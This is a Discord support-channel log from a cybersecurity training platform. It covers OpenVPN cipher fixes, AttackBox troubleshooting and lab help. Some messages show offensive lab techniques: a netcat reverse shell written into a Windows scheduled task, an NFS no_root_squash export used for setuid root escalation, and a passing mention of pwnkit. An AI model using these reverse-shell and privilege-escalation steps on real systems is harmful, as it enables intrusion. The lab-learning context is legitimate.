#site-support

https://bun.filedit.ch/LlFGFuUZbilQzYXUMiHr.png

I'm not too happy opening unknown links, so please rather use the verify and upload your screenshot directly in here 🙂

i don't have a permission to upload

!docs verify

Hi, can someone help me out, I’m kind of freaking out right now

wassup

Okay I dont know your community very well so I apologize. My bank info was stolen and used to make transaction on tryhackme.com and I dont know who to contact on their website

@bronze vale

Thank you so much

don't trust virustotal on everything tho, I've visited the link and it's literally just an image

here is virustotal flagging localhost as malicious

I know this isn't the correct way, usually you have to email support@tryhackme.com
but since it's something like that I just pinged him, please wait for him to respond and don't dm him 😄

I’ll wait and email them on this email. Thank you so much

DM me the email address you are emailing from please

I will

sorry for the ping btw, thought this was an urgent case

I'm having trouble using this solution.

Guys I upgraded my kali os now I can't connect to tryhackme via openvpn

I am in the correct directory, too.

what error are you getting?

I am not getting an error, just key output.

solution is pinned in this channel :)

what error are you getting when trying to connect? if it's something with cipher check pinned messages

can you share a screenshot of what you're getting?

Yeah, it's the cipher issue.

One moment.

Thanks

Gave +1 Rep to @celest wadi

nvm i fixed it

Howdy ... I keep getting getting errors from Kali openvpn when using the THM .ovpn configuration. specifically it's complaining about the cipher negotiation advising that openvpn 2.6 ignores the "cipher AES-256-CBC" option in the configuration and that the local agent cofnig file needs amending ... I've spent about 30 mins searching around and can't really find the openvpn local config file to amend ... can anyone help?

use this command
sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

(in the directory of your ovpn file)

what's the outcome?... is it just inserting the ciphers line back in with AES-256-CBC?

suprisingly, it seems only kali has this issue, ubuntu works

it changes the old cipher line with the new one that is used in version 2.6 and is fixing the cipher problem

version 2.6 uses the line data-ciphers instead of just cipher to declare what encryption they are using in the connection, this is what is giving the cipher problem as version 2.6 can't figure out cipher for some reason

if only kali knew, that 2.5.6 is the right way

ah thank you 🙂

you're welcome

there will be a proper fix soon, but this is a temporary fix until then

I can't wait for MW2.

Hello guys.

Can I ask any questions here?

You already have so I'd encourage you to continue 👌

I'm in a weird dillema at the current moment.

Well basically.

Most of my dad's accounts got breached.

I was helping him secure them by changing the passwords, running malware scans, etc.

The usual.

So turns out, that there was some sort of phishing/spamware that had access to his Facebook account.

It send a very suspicious link to all of his contacts through messenger.

Report to facebook.

I ran the link through ScanURL, Phishing Tank and Virus Total.

Yea, we're doing that too.

But my dad really wants to find out what the link is for some reason.

All of them stated it was safe.

Which is weird.

My dad then forced me to run the link on my PC (I was extremely reluctant)

And after running the link, MalwareBytes and McCafee detected no malware.

And the link was an "https" link.

Not an "http" link.

So I'm extremely confused here.

On how this would work for phishing.

Cause I doubt that it's not a malicious link.

Anyone got an idea on what's going on here?

And btw it's just showing a weird loading animation after opening it.

Probably re-direct this to the general chat as this is technical support specifically in the context to TryHackMe functionality i.e. connecting and using their services.

as for your situation... just apologies to the contacts it got sent to advise them it's malicious, close the chapter and leave it alone ... unless it's your day job to reverse engineer indicators of compromise or do digital forensics incident response it's far too much time and effort to even get a tangible answer

Dude I don't know what to do.

My dad is forcing me to "Reverse Engineer the link"

And he's said "Either do it or give me your PC and let me do it"

And I KNOW he'll fuck my PC up beyond oblivion if I let him "Reverse Engineer" the link from here.

Anyways over to #general

is anyone else having issues connecting to the servers

Depends on what the exact issue is that you are having 🙂

Trying to use my attackbox but it keeps saying it can't connect to the servers

It goes 100% then just shows connecting

after a few mins it prompt msg "Can't connect to server" then restarts

That one? https://cdn.discordapp.com/attachments/521771811768107008/990929125369864242/2022-06-27_11_36_26-.png

Yes!

Mh, I guess there is no real fix to that.
So just give it some time, refresh the page after a couple of minutes (maybe even with Ctrl + F5)

Or if it's still not working after some time, restart the attackbox

Ok thank you.

I'll just wait a bit

Same

Restarted it multiple times and already tried connecting using putty, but there is no public IP showing

Oh lucky me..it works

There you go then 😄

Was just spinning up an attackbox to see myself

This discord server looks sick tbh

Sorry to ask ... does anyone know where the config file on Kali so so I can amend some of my openvpn settings ... seems I keep getting disconnected when controls packets are sent:

2022-06-27 16:06:46 WARNING: 'link-mtu' is used inconsistently, local='link-mtu 1589', remote='link-mtu 1602'
2022-06-27 16:06:46 WARNING: 'auth' is used inconsistently, local='auth SHA2-512', remote='auth SHA512'
2022-06-27 16:06:46 WARNING: 'keysize' is used inconsistently, local='keysize 128', remote='keysize 256'

Try to change the settings to what it says in remote

I'm unsure of the syntax of the config file .. just added those in and errors with "un-recognised options"

What file did you change and can you send a screenshot of how it's looking

it's the .ovpn file provided by THM

Okay, that's the correct one to change

I am not at my pc right now to check my config, but @deep spire might be able to check against a working one

I'll have a look

Thz, I am first home in like 45 minutes, so I can only do basic from the top of my head support 😅

Might be able to figure it out from: https://github.com/OpenVPN/openvpn/blob/master/sample/sample-config-files/client.conf

Not seeing keysize or mtu in the .ovpn file i opened... What version of openvpn are you using @craggy skiff , What command are you running, and what are you connecting to?

has this only just been downloaded?

2.6

the .ovpn was fresh this morning from THM

Can you try regenerate one real quick?

command: sudo openvpn /etc/openvpn/client/bitbyte.ovpn

sure

A fresh one has given you mtu 1602 ?

It gave 1589 they changed it to 1602 cause the remote said it used that and i told them to change it

Then run the sed command in pinned and try now

sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

I have never seen any fresh config file with any mtu value set, so that's why I was wondering 😄

Same, but the VPN servers have been weird since 2.6 came out

connects again ... but I'm getting drop outs when TLS control packets are received

assuming it's those 3 warnings about mtu, auth and keysize

well more around the mtu as that's more relatable to a stable connection

Can you try Uninstall and install v2.5.7

It seems you are having multi vpn, at least in that screenshot

Since it's creating tun1

Oh

Couldn't see that cause on phone, don't mind my message

fresh kali install this morning following the apple M1 guidance from their site

Just do sudo killall openvpn
Then connect again to the vpn

but I've not configured anything else unless it's vmware fusions vm-tools

Don't judge me on the FFXIV 😄 I like it haha

Looks better now, so just try if you have any connection issues still

Ok ... will give it a go and see if it remains stable

still concerned that it's spitting those warnings

from what i've been reading it suggests the .ovpn syntax isn't correct

well for the client sorry

Well my dev tools console is spitting a lot of warning too on nearly any webpage.
Not sure if I would be too concerned about it 😄

will have to just chow down on my Aero and let me worries bubble away

Guys everytime i click the link after i start the machine it says it took to long time for the page to response(when i paste it in browser).. how can i solve it

Can you verify and send a picture of the problem

!docs verify

ok i will thx

Have you connected to a VPN

Ahh no

https://tryhackme.com/room/openvpn

This should help

Am using brave

what i remember they use proxy

right

That is a different thing

I didn't know that it could be proxy or vpn that did all

No worries

In the link that I sent you'll see a guide for windows

Ok thx if anything i will tell u

No problem

Is there a fix to this yet?

Splunk 2 Task6 Q4 won't accept my answer which I have confirmed elsewhere is correct. It is probably because it contains characters not on the English keyboard but I can't see any way to work around that

use this command
sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

thanks

I had to do sudo killall openvpn before to make that work too

its not showing my ip in the top bar which is weird though

usually it does

Idk why that doesn't anymore

Strange. anyway thanks @pastel tinsel

Gave +1 Rep to @pastel tinsel

Might be the new update

what was there an update to?

||나는_데이비드를_사랑한다.hwp||

Openvpn

Try copy and pasting that.

oh i see

It updated to v2.6

No good, telling me it's incorrect

thx so much it worked

oh huh...... don't recall how shadow did it but they did somehow

probably

?

you can just use the compiled binaries on their github page :)

yuup that is what shadow did

it says use this command but it's not working

go get github.com/ropnop/kerbrute

this explains why it is in the git folder

https://github.com/ropnop/kerbrute/releases/tag/v1.0.3

just get the amd64 linux one and you're good to go

do I just have to clone it?

nah, just click on it

thanks

click the button or copy the link and wget it

not working it just download the file!

well you need to mark the file as executable too

with chmod +x kerbrutefilethingy

can u pls show me the steps

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
./kerbrute_linux_amd64

this is assuming you are trying to run it on kali linux which honestly you should

nah, those commands should work on any major linux distro

yuup but shadow more meant if they were using windows

yeh, don't use windows

works now thank u so much 🙏

Gave +1 Rep to @plush bay

hope you understand what all of those commands do and you did not run that blindly but yeah

you might want to copy that binary to /usr/bin/ or /bin so you don't have to manually run it every time

because if the executable is not on the PATH variable in linux you need to tell the shell where the executable is exactly.... ./kerbrute_linux_amd64 here means run this executable in this folder

so if I move it to /usr/bin/ it show work using kerbrute?

nice, thank for all help guys

you're welcome

normally shadow would place it in opt and add that opt to the path variable but there are lots of ways to add programs to the path

it's a throwaway vm ya'll, not a prod server

you'd just pwnkit it

Even after restarting this room (https://tryhackme.com/room/furthernmap) multiple times, I can't seem to access the ip it gives me. I am connected with openvpn, but it seems to be broken, and I can't ping the ip on both my vm and host machine. Is this just me, or is the room broken?

can you show the output you get on your openvpn?

there's been a pretty common issue with openvpn recently

you mean this screen?

uhh, no?I meant the openvpn command you ran to connect to the thm network

the end of the ouput from that one

so if shadow gets the above correctly you are connected to the vpn on your host machine instead of your kali vm???

👀

uh I'm connected on both lol

that's a bad idea

Only connect with one

does it matter which one?

If 2 is connected it breaks

yes

it creates a single tunnel

connect on the vm

Yes, the kali vm

ok

lot of violet rn 👀

yuupsd

we fighting over the rep point

I'm just watching 👀

it seems to be connected on my vm

can you show the output?

okay then try this in the kali vm terminal curl 10.10.10.10/whoami

if it gives you a ip that means you are connected

what output lol idk what I'm doing

!openvpn

the output of the openvpn command

.... okay

!vpnscript

Hi. I'm getting too many machines error when spinning up an attackbox on the web

https://tryhackme.com/room/openvpn task 4 @foggy elm

!vpn

bonk, got it

lol so many links

i'll check

nice zeeshan

Best to show a screenshot of what you mean by that

2 of the links are the same

Is there a way to kill old instances?

https://tryhackme.com/api/vm/running

check the running machines from there and go back to the rooms and terminate them

As an alternative, you can use that: #site-support message

or there's the js

this explains how to kill all running vms so that you can start them in the room you are in without manually doing so

what are you looking for from the output? discord doesn't let me send the whole thing

Thanks

darn fontaene was quicker

the last few lines

Mon Jun 27 20:14:32 2022 Initialization Sequence Completed

if it says initialisation sequence complete it is running

and that is where you should leave it and open another terminal tab or terminal window

2022-06-27 14:16:34 ROUTE_GATEWAY 10.0.2.2/255.255.255.0 IFACE=eth0 HWADDR=08:00:27:64:44:52
2022-06-27 14:16:34 TUN/TAP device tun0 opened
2022-06-27 14:16:34 net_iface_mtu_set: mtu 1500 for tun0
2022-06-27 14:16:34 net_iface_up: set tun0 up
2022-06-27 14:16:34 net_addr_v4_add: 10.6.33.33/17 dev tun0
2022-06-27 14:16:34 net_route_v4_add: 10.10.0.0/16 via 10.6.0.1 dev [NULL] table 0 metric 1000
2022-06-27 14:16:34 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2022-06-27 14:16:34 Initialization Sequence Completed

well then you are connected

yeh, it's running fine

might still have multiple instances

can you open another terminal and run curl 10.10.10.10/whoami now????

ok

if that gives you a single line of output with an ip you are connected and should probably not have any problems

wait a second was I not supposed to stop the command that opened the vpn

nope you are not supposed to stop the command that run the vpn

you are meant to leave it running in the background as long as you wanna hack on tryhackme

ohh maybe that's what I'm doing wrong

could be yeah

this returns an ip address

nice

that ip is your kali vm:s ip on the tryhackme network which means it is the ip you would use in a reverse shell

and as long as you don't get a new vpn file it will stay the same

ok nice

now that you are connected try and reach your target machine again

I still can't ping it :(

is it a windows machine???

umm idk?

I'm trying to do this to learn nmap lol

okay then..... try using nmap with the -pN flag against it

also recommend -F to speed it up imensly for us to trouble shoot

as a note I haven't been able to connect to other ips with the same room

oh woops

wrong flag capitalisation

it should have been -Pn

TADA

it worked

the machine is working?

if you know how to read nmap results that is

yuup it is

or you would not have gotten the results that those ports are open

this should tell you some of the task question answers too

when I tried pinging it before it said all the ports were closed lol

that's weird but its working now

ty

no problem

hope you learnt a lot from this and that your journey becomes a bit easier now

also using the ping command against that target machine is never going to work as it has ping disabled

oops

hence learning some alternatives to ping with nmap to see if the host is there is useful

if this room is not enough for your nmap learning there is the nmap module that teaches you host discovery tricks

oke tyty

good luck and have a fun learning journey

I am having kali issues and was wondeering if someone could ofer there assistance

what issues ?

first openvpn isnt working

what error is it giving you?

Options error: In [CMD-LINE]:1: Error opening configuration file: /home/downloads/jupiter3.ovpn

openvpn --version

OpenVPN 2.6_git x86_64-pc-linux-gnu

permissions are correct for the current user ?
sudo openvpn /PATH/to/vpn/file

yes

also see the pinned messages, you have to add data-ciphers AES-256-CBC , in your vpn file it is going to be cipher AES-256-CBC , change it and try again

that won't help

not with that error message

can you verify and then send a screenshot of when running the VPN?

!docs verify

oh havn't seen this

it wont run

just give a screenshot of the error message

there

yup

What, tbh that seems to be just the wrong path, no ?

no, it's the config, unless it will say file not found

But what directory should be /home/downloads?
Shouldn't it be /home/jupiter/Downloads ?

oh yeah

no your idea fixed it

now how do I disconnect??

ctrl+c

thanks

Gave +1 Rep to @pastel tinsel

I have another issue but its not really tryhackme related

+rep

Gave +1 Rep to @smoky berry

+rep @pastel tinsel

Gave +1 Rep to @pastel tinsel

+rep

+rep @naive dust

yup

heey, i regnerate a new config, but have still a problem

Try to connect as usual via sudo openvpn yourconfig.ovpn and show a screenshot of the output pls

Regenerate your openvpn file and download it again, you might even have to change server

okay, i'll try

I switched to EU-2 but i can't download a config

@crystal marlin thanks, EU-3 is working for me

Gave +1 Rep to @crystal marlin

hey guys, anyone here using RDP to connect to the attack box? it's kinda usefull as you can use keyboard shortcuts for example.

I tried connect to the attackbox using Remmina but the refresh rate is like 0.5 fps which make it ... kindof a pain in the ass to use. Any suggestions?

Hi, can i ask a question if u are there ?

sure

If i can, i try to use hydra on a challenge, but at the begining it put 2800 tries per minutes

I canceled like à moron and now its 90

I reboot the VM, my computer my command but nothing to do...

And sorry for my english i have an excuse : i am french 😔😉

I googled that and they say we can us GPU on hydra, but its remotely attack so i dont know if its possible for that

I dont know if i must to say what is the room because i dont know if its a spoil for the people here

And i dont know if i am in the good channel on discord...

Hi folks, can anyone give me a sensible answer to using nano across a shell. I'm doing the IDE room and everytime I use Nano as the text editor it just corrupts and does nothing. I cannot for the life of me figure it out.. I end up having to cancel the shell and start the chain again. I can get no further and I can find any sensible answer on google. The writeups all use nano so it's my fault...

first stabilse the shell

then set the rows and columns

tput lines && tput cols will write out the rows and columns if you run it in your terminal while not in the target machine shell

stty rows <num> columns <cols> will set the rows and columns when you have stablised the shell

Of course, I'm a total egg. I done the first part and overlooked the rows and columns! 😄

well if you have stablised the shell you could use ctrl + c or ctrl + x to exit nano

sorry only ctrl + x

also don't forget to export the term variable

I used the "python2 -c import" etc etc then the "export TERM" etc etc then "stty raw".. that's as far as I went. Doing that doesnt let me use any commands in nano.

export TERM=xterm-256color

oh yeah for nano it needs the rows and columns to act like you expect

for other stuff it is not nescarily needed

hmm interesting, I just used "export TERM=xterm" I've never used the 256 color tag previously.

that just means it will default to use colours from the bashrc file

so not really nescary but useful to shadow

OK that's good to know. Thanks for your assistance 🙂

no problem

also can shadow recommend to you to verify your discord with the bot using the following link to be able to send pictures here and show of you tryhackme level

!docs verify

@spring pilot ⬆️

Cool, have done that now.

oooh nice already a wizard

A wizard who obviously didn't read the whole "shell stabilisation" room 😄

Because the columns steps are at the end after the socat section...

A very lazy boy indeed.

well we live and we learn

I keep getting an error that I can only have three machines started... but I can't find out an easy way to see what machines I have started so I can terminate them, is there any way to do this?

Yes, if you visit https://tryhackme.com/api/vm/running

Do you know how to use the console in your browser?

Sure do

fetch('/api/vm/running')
  .then(r => r.json())
  .then(vms =>
    vms.forEach(vm =>
      fetch('/api/vm/terminate', {
        method: 'POST',
        body: JSON.stringify({ code: vm.roomId }),
        headers: {
          'csrf-token': csrfToken,
          'Content-Type': 'application/json'
        }
      })
    )
  )

If you paste that in the console for the browser, it will close all machines that are running.

csrfToken is not defined

Intersting, I got a different error.

But the link above should show you wish machines you have running.

oh yes

then I can go to the rooms and terminate

sweet, got it

Yeah, manually.

yep!

When that code works it usually just closes them all.

makes sense, thanks for the help!

I just tried there again (whilst on a THM page) and the code worked, oh well, glad you got there in the end.

Happy Hacking

hey guys, any tips for either:
lowering latency when connecting to the attackBox via RDP? (other than changing color depth, I already did that)
OR
capturing all keys when using the attackbox, from web browser?

Thx 🙂

Capturing all keys?

like being able to use keyboard shortcuts, to change desktops, resize window, etc
Like using the windows key in the attack box, or using ctrl+alt + "right arrow"

Maybe full screen mode?

thats when you want to use your own copy of a kali linux vm

as doing that over vnc and rdp for the attackbox and windows targets is not easily possible

nah cause keys are detected in my OS not in the window

I wish but my laptop is really REALLY slow ... that's why I want to use RDP

errrf

or kali with just 2 gigs of ram and 1 cpu

guys 😆 nooo

well the attackbox is over vnc

best for me is RDP or just using an attackbox that would capture keystrokes ^^

na i want gui. I prefer attackbox moar than no gui

I know 🤔 so what

well maybe you can connect via vnc to the attackbox from your main pc using a vnc tool or you can use ssh from the my-machine page

this is what I do

https://tryhackme.com/my-machine

the problem is: very low fps

but getting the gui over and allowing copy pasting and other keyboard shortcuts is gonna be a pain

I already downgraded color depth, any more suggestions?

yuup get a new better computer

other then that not much no

no, that I already did with the VNC connection. The only problem with the VNC connection is the low fps.

The only problem with the web browser attack box is capturing keystrokes.

I just need one of them to work

🤔

Upgrade.

you can't make the web browser version accept ctrl c and ctrl v sorry

which leaves you with the option of trying to get vnc to work nicely

ah common 😆 send me money then
I am one parameter away from making it working 🙂

hmmm know anyone using VNC with good performance?

everyone that uses it in the browser instance

I meant, through a RDP client 🙃

vnc != rdp

uh sry i meant RDC as in Remote Desktop Client ...

remmina

or how ever it is spelt

so when you said that you meant using a remote desktop client software, working with the VNC protocol?

yeah as shadow assume that has a vnc mode

could be wrong

never really used vnc

that's what I am currently trying. But remina gives me very slow fps

¯_(ツ)_/¯

mmh okay but keystrokes are usefull and good laptops expensives 😢

but over 100% useful

a good laptop will last you multiple years and let you run whatever software you want on it

yeah I know 🙄 I just do not have money RN

eh christmas is just 6 months away

wishing for money or a new computer is doable

worst case senario you just get money

I'm too used to em

it's not just the c+v c+v

it is your own problem if you can't adapt... and being able to adapt quickly to change is going to help you on your hacking journey

🤦‍♂️

yeah that was maybe a bit harsh

Hey guys,
This is linux privesc task 11,
I have compiled nfs.c file with gcc nfs.c -o nfs -w , and moved the executable to mountpoint , when I try to execute it in ssh mode, it says not found the file, don't get the problem :/

hi

why is it not opening the website as a part of the authentication bypass room?

like its not showing up. so weird

the IP only shows up as a "CUSTOMERS_IP"

nevermind I solved it

just had to terminate other instances of the server

having troubles connecting to openvpn, any ideas?

Hi. I'm in the Empire room https://tryhackme.com/room/rppsempire, and there are lots of pictures that can't seem to load

can anyone help me retrieve my account in fb i forgot the password and the sim i used to activate the acc is gone idk how to retrive T^T

Hi, try connecting normally with just running sudo openvpn *VPN config* this will give us the errors so we can help you

No, we are not hackers for hire, go contact Facebook support

Hi, put this in #room-bugs instead

Sure

Hi folks, I am unable to connect to boxes with openvpn. Is there a known issue with connecting with Openvpn on Linux?

Hi, yes, there's a problem when openvpn updates to version 2.6 what error are you getting when trying to get on the VPN?

Indeed. I'm running Openvpn version 2.6 and it's stuck in a retry loop.

If you can verify your account and send a screenshot it would be great

!docs verify

This way it's easier to see what the problem is and figure out what to do to fix it

I can't connect to the vpn ... It was working till last day but today it is not connecting ..... I've tried to regenarate and even change the server but still the problem occurs.... anybody please help me... It's my 104 day streak and I don't want to lose it...

Hi, can you please follow the link just above and verify your account, then you can send a screenshot of the error that you are getting, then it's a little easier to help

I think there's a general issue connecting if you're running OpenVPN version 2.6.

Yes there is, there's some changes in the config

Any mitigations I can do from my end?

use this command
sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

That will change the config to have the right cipher that it tells you is missing

great

this killed my error

thanks a lot 🙂

You're welcome

i change my mind. Sed is my new favorite

Sed is really useful

friendship ended with nano

I may be doing something wrong

nvm, got it.

Thank you so much !! I was struggling since yesterday and now it works ^^

Gave +1 Rep to @pastel tinsel

you're welcome 😄

I only have a question to ask if possible . My subscription will end at the beginning of 'octobre' and I wanted to know if the payment for next year will pass automatically or do I need to remake it by myself , and thank you for answering my question .

If your current sub is from a voucher, it will not automatically renew.
If it's not from a voucher and you haven't pressed cancel on your profile page, it should automatically renew.

there s a way i can stop this ? since it is not from a voucher and i dn have acces to the account anymore

Sure, press cancel on the profile page and it will not renew itself, but you still have premium until you have paid for

I understand but the problem is : I dn have acces to this thm account anymore

email support then

!email

Contact support with the email that you had the account on

If you remember the email

too slow

I understand thank u so much guys ❤️

what do we use to remote to a windows box from the attackbox, ive been away for a while and used to use rdesktop but thats not avaiable anymore

xfreerdp

thank you

Gave +1 Rep to @celest wadi

this fits more in #infosec-general

Will move it, cheers

Hey i am not able to connect using openvpn something is wrong

use this command
sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

did this help or do you still have problems?

Sure thanks a lot can you tell me what was exactly wrong

Gave +1 Rep to @pastel tinsel

because openvpn updated then it has changed in how it takes the config file, but TryHackMe's VPN servers is still sending old configs out, so because you have a new client it cannot understand the old config, since cipher in the old config is changed to data-ciphers in the new config

cool

thanks

no worries

?

it's not universally executable?

did you chmod +x it?

yess +x and +s

what does it mean ?

it means everyone(every user) can run that

yes yes

can you show a specific ls -la nfs?

it was yesterday, let me a minute to reproduce and tell you

👍

can you also give me a screenshot of file nfs and ldd nfs

oh I have screenshot from yesterday's here is the file output

can you also give me a screenshot of uname -a

I have made the executable in intel processor computer, then transferred it to m1's vmware fusion kali , which OS's uname -a ?

Executable made in intel processor machine
Connected/mounted the shared directory in Vmware fusion arm64 kali machine

that's the problem

those are all different binaries trying to run it which can't make it run

I am running it by ssh-ing to the thm machine

but you'd get a different error for that one

which is intel proc

it's saying it can't find the file

nope, running 32bit programs on 64bit OS's in kali shows the "no such file or folder" error

That was interesting

well, when you don't have 32bit compatible libraries

Maybe you have that libraries 32 bit

that's why it is running

32 bit programs should run on 64 bit OSs

the reverse isn't true

I also know that theory

but can't understand then this problem

as I've said give more details

if it's compatible with it

aka have libraries that can run the 32 bit

yeh, obviously no arm amd mix

@lofty rock try and compile it in the kali vm

the kali vm is arm64
the elf file will be arm64

a sec I will show you

just try it 😄

then we'll see if that is also a problem

kali vm

Linux kali 5.16.0-kali7-arm64 #1 SMP Debian 5.16.18-1kali1 (2022-04-01) aarch64 GNU/Linux

Kali not vm

Linux kali 5.18.0-kali2-686-pae #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali1 (2022-06-20) i686 GNU/Linux

no worries, try to do the task and just compile the program in your vm that you use as attackbox

$ ./thm
-sh: 4: ./thm: Exec format error

what folder did you mount?

/tmp

that's the wrong one

iirc

try backups folder

/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)

It has no_root_squash

hmmm

give me a second I'll do the task myself real quick

when running the file, are you ssh on the target machine and running it as karen?

yes

hmm, can you show the script?

cause I just got it to work

sure

that's a whole different kinda script

and it's flag7 for task 11

a sec

okay I have changed it to flag7, same exec format error

all you need for task 11 is this

it shows in the task 😄

but, why can't I cat that file when s bit is set ?

Why is it exec format error ?

I don't know, I haven't looked at that script before

you can't cat a binary if that's what you're doing

I am catting flag7.txt

can you show it plz

here it is

I will try this now

I have changed the code to this same exec format error 🙂

how do you compile it?

hmm, something breaks

I guess that cat script would also work

give me a second and I'll send you my compiled script

I am already downloading kali 64 bit image 😂 I am done with this

okay it executed , but I became from karen to karen

I am messed

so the thing is it works with onnly 64 bit intel executables

and chmod +s nfs, chmod+x nfs, I become from karen to karen

I am really sorry for your time, I am just trying to understand

smh, dropping strange binaries in chat

Had to do it fast cause we closed down for today

No worries, we are happy to help and guide, is it possible to try it out from the attackbox?

you mean tryhackme attack box ?

Yes😊

It worked perfectly in thm attackbox

I made .c code with setgid setuid and bin bash, and became root

do you get what was the problem ?

It's just up above

even with your executable it didn't work, I really don't understand what's going on

Kinda, but now we know that it's some architecture mismatch

even that 32bit one ?

which theoretically should work on 64 bit

Probably, have to look more into it to give a more concrete answer

okay I see,
however thank you a loot, for your time

+1 rep @pastel tinsel

how does this work ? xD

No problem, we are here to help

thanks!

Gave +1 Rep to @pastel tinsel

Need help please

Sure wassup

Openvpn not getting connected

use this command
sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

6-GCM:AES-128-GCM:CHACHA20-POLY1305') if you want to connect to this server.
2022-06-28 20:34:07 ERROR: Failed to apply push options
2022-06-28 20:34:07 Failed to open tun/tap interface
2022-06-28 20:34:07 SIGUSR1[soft,process-push-msg-failed] received, process restarting
2022-06-28 20:34:07 Restart pause, 10 second(s)

thanks let me try ill get back to you'

After using it try again

it works like magic

thanks

you are a god

You're welcome

👀 👀

It's a common problem

Since the new update of openvpn

i was searching for solution

couldnt find one

Yeah, I should publish it

it should be pretty common

yeah you should

thanks again bri

*bro

Should it be another time

(meaning if there's another problem I'll gladly help)

okay thanks

hello

HHello

Hi

Hi My openvpn is connected but I cannot open victim machine

Tried troubleshooting with tryhackme script on github but no luck

Can you verify and please send screenshots?

!docs verify

Please help

Check the most recent pins in this channel (:

Hey good people. qq, how do you add your cert title to the account?

Yeah for discord. Thanks

Gave +1 Rep to @gray loom

Hey there, you can send me a DM about it 🙂

oh I didn't realize you can do that now 👀

Hi Infinity, did you solve your problem?

I pretend I can, let's see how it works out 😄

remember, the command is -arole <the cert>

talking like a pro support person right now

I mean, I am pro, I do it for living

Hey guys, can I bother you again ?

not me

shoot

oof, this is going to be long

I am on Windowd privesc room ,
this one is going to be really stupid question,
on task 4, I have rdp-ed to the Windows machine, did this command to change the scheduled task:

 echo "c:\tools\nc64.exe -e cmd.exe <my ip> 9999" > C:\tasks\schtask.bat

And ran the scheduled task to be executed now:

 schtasks /run /tn vulntask

I don't get the reverse shell both in my machine and attacker box THM machine.
But I do get the shell when I simple run nc command:

C:\tools\nc64.exe -e cmd.exe <my ip> 9999

use double slashes

pretty common mistake

oh sorry

that's the other task

hmm, there's more help in #987074227335233607 but make sure you foolow the instructions to a tee

it is not working telling me there is no "-e" option

Certain versions of netcat do not support "-e" for security reasons

Try googling for an alternative when you encounter that scenario.

it is supporting I have tried it without task scheduler it works fine

guys it was done with cmd prompt

with powershell it doesn't work

idunno why

the're getting help in the other channel and that flag is incorrect

#987074227335233607

When connecting to the throwback network I encounter this problem

When connected, it says 2022-06-28 22:12:13 Restart pause, 5 second(s)

Trying to regenerate files didn't help me

is there a cipher error in the openvpn output

is it not working at the moment?

@celest wadi

yeh, the new version openvpn has a bug

more likely all

run this command in your ovpn file directory to see if it fixes it:

sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

You suggest finding an older version of the package?

not necessarily needed

you can just update the ciphers in the file

wow thanks

You really are a wizard.

I had in mind to edit the config

But apparently I'm too lazy and you pushed me to do it)))

well, it works now so that's good

DON'T TAKE CREDIT FOR MY COMMAND

oh btw, feel free to verify, then we can easier help in the future cause you can send screenshots

!docs verify

well, that was a pain doing it in awk but this command works the same, it doesn't even modify the original files so the're intact

awk '{sub(/cipher/,"data-cipher"); print}' *.ovpn > working.ovpn

you want the original file intact?

it's so if anything goes wrong or they need the original

sed 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn > fixed.ovpn

done

yeh, but mine is better

(that was a joke)

spending more time finding ways to automate a basic one word fix, this is my kind of fun

same

NERDS

which is a good thingy

just means we like the topic

learning awk and sed would be good for shadow

sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn -> quicker way using edit file in place

Getting error: Unable to negotiate with {IP} port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

Linux PrivEsc room

Add -oHostKeyAlgorithms=+ssh-rsa to your ssh command

it worked, thank you!

Gave +1 Rep to @crystal marlin

I'm trying to log in but there's no captcha to click on (even if my username and password are correct)

am I missing something?

do you have adblocker running?

yes

I tried to disable the adblocker for the THM site but the captcha won't show

Try ctrl+f5

Hello ! I had some 403 errors on all image on lab https://tryhackme.com/room/rppsempire @sharp bear @rigid oxide

hi guys ! Is there an admin available ? I have an issue with openvpn .. ^^

Try to run the command in the first message that is pinned

amazing, ty ^^

Gave +1 Rep to @pastel tinsel

You're welcome

Doesn't work

I've disabled the adblocker

deleted cookies

restarted the browser

and still can't see the captcha

Tried a different browser?

oh finally!

I'm in

Did it work with changing browser +

nope

just clearing all cookies

Fair

Hey! There is no need for those pings, please use #room-bugs if something is broken with a room.
Beside that, it has been already reported in there 🙂

Ok sorry 🙂

not sure if this is the right channel for this but there is an issue with the https://tryhackme.com/room/attackingkerberos

Task 4 instructs you to download and install impacket <0.9.20 but the GetUsersSPN.py is not right

it is riddled with errors

i have corrected 13 errors in the code so far and no dice

Hey kyooty, I’m still facing the same issue I cannot access any Thm IP when connected with openvpn

look into what version of python youre using vs what version the module is written in. That sounds like the root of your issue

My friend posted this on LinkedIn

Hey TryHackMe, I would like to upload a set of 6 VMs to my created room, of couse if possible I want to make it public so more people can enjoy my room! It is an Active Directory set. I uploaded them respectively, but I got convertion error after that. I tried to reach out to Support Team few days ago, but I have not received any update.  I appreciate your attention.

Who could he reach out to?

I am the creator, thanks for spreading my issue. I appreciate it!

@stray cove Can you or one of the mods get @grave oar creators lounge role so he can get some help with his vm upload issues? I expect he might need some additional help setting up an AD network.

Thank you buddy

Don’t thank me yet. We haven’t gotta sorted out. lol. In the meantime, please read https://docs.aws.amazon.com/vm-import/latest/userguide/vmie_prereqs.html and make sure your VM meets those requirements.

Yes I read it. Some VM are Windows Server 2019 Evaluation version, I did not see the guide mention it. So Evaluation version is not accepted?

I’m not sure. The AWS docs say Microsoft Windows Server 2019 (Standard, Datacenter). Doesn’t mention if Eval mode is a non-starter. Would you know @tawdry orbit?

Can you please send a screenshot of the error that you get?

@zealous yoke when you are awake, can you help this guy out with the room-creator role

I can get the role hang on

Ok done

As for windows vms, I think thm takes care of the licensing

always creating good content

We (I) need admin credentials being sent

